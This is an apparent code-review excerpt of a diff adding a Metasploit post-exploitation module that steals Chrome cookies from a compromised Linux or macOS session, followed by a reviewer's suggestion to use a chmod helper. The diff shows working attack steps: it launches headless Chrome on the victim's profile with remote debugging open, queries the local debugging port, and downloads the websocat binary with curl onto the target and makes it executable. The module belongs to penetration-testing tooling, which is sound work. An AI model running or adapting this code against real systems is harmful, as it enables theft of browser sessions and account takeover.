modules/post/chrome/gather/cookies.rb

```diff
@@ -0,0 +1,176 @@
+        OptString.new('COOKIE_STORAGE_PATH', [false, 'Where to write the retrieved cookies temporarily', '/tmp/websocat.log']),
+        OptInt.new('MAX_RETRIES', [false, 'Max retries for websocket request to Chrome remote debugging URL', 3]),
+        OptInt.new('REMOTE_DEBUGGING_PORT', [false, 'Port on target machine to use for remote debugging protocol', 9222])
+      ], self.class
+    )
+  end
+
+
+  def configure_for_platform
+    vprint_status('Determining session platform')
+    vprint_status("Platform: #{session.platform}")
+    vprint_status("Type: #{session.type}")
+
+    case session.platform
+    when 'unix', 'linux', 'bsd', 'python'
+      @platform = :unix
+      @chrome = 'google-chrome'
+      @user_data_dir = "/home/#{session.username}/.config/google-chrome/"
+      @websocat_url_suffix = 'i386-linux'
+    when 'osx'
+      @platform = :osx
+      @chrome = '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
+      @user_data_dir = expand_path "/Users/#{session.username}/Library/Application Support/Google/Chrome"
+      @websocat_url_suffix = 'mac'
+    when 'windows'
+      print_error "Windows isn't supported by this module. See github.com/defaultnamehere/cookie_crimes for manual instructions."
+      @platform = :windows
+      return
+    else
+      print_error "Unsupported platform: #{session.platform}"
+      return
+    end
+
+    unless datastore['CHROME_BINARY_PATH'].empty?
+      @chrome = datastore['CHROME_BINARY_PATH']
+    end
+
+    @chrome_debugging_cmd = "#{@chrome} --headless --user-data-dir=\"#{@user_data_dir}\" --remote-debugging-port=#{datastore['REMOTE_DEBUGGING_PORT']} #{datastore['HEADLESS_URL']}"
+
+    nil
+  end
+
+  def activate_remote_debugging
+    @debugger_pid = cmd_exec_get_pid(@chrome_debugging_cmd)
+    print_status("Activated Chrome's Remote Debugging via #{@chrome_debugging_cmd}")
+
+    # Sleep so the Chrome process has time to start and open
+    # the tab before we query the remote debugging port.
+    # You may need a longer sleep time on a slower machine.
+    sleep 2.seconds
+  end
+
+  def get_websocket_url
+    response = cmd_exec("curl -s http://localhost:#{datastore['REMOTE_DEBUGGING_PORT']}/json")
+    websocket_url = JSON.parse(response)[0]['webSocketDebuggerUrl']
+    vprint_status("Found webSocketDebuggerUrl #{websocket_url}")
+    websocket_url
+  end
+
+  def download_websocat
+    if Pathname.new(@websocat_storage_path).exist?
+      print_status "websocat binary already exists at #{@websocat_storage_path}, skipping download"
+      return
+    end
+
+    url = WEBSOCAT_URL + @websocat_url_suffix
+    print_warning "Writing websocat binary to #{@websocat_storage_path} temporarily"
+    print_status "Downloading #{url} to #{@websocat_storage_path}"
+    cmd_exec "curl -L #{url} > #{@websocat_storage_path}"
+    cmd_exec "chmod +x #{@websocat_storage_path}"
```

Comment:
It should be possible to test the new `chmod` command here. It defaults to `0700`.

```suggestion
    chmod @websocat_storage_path
```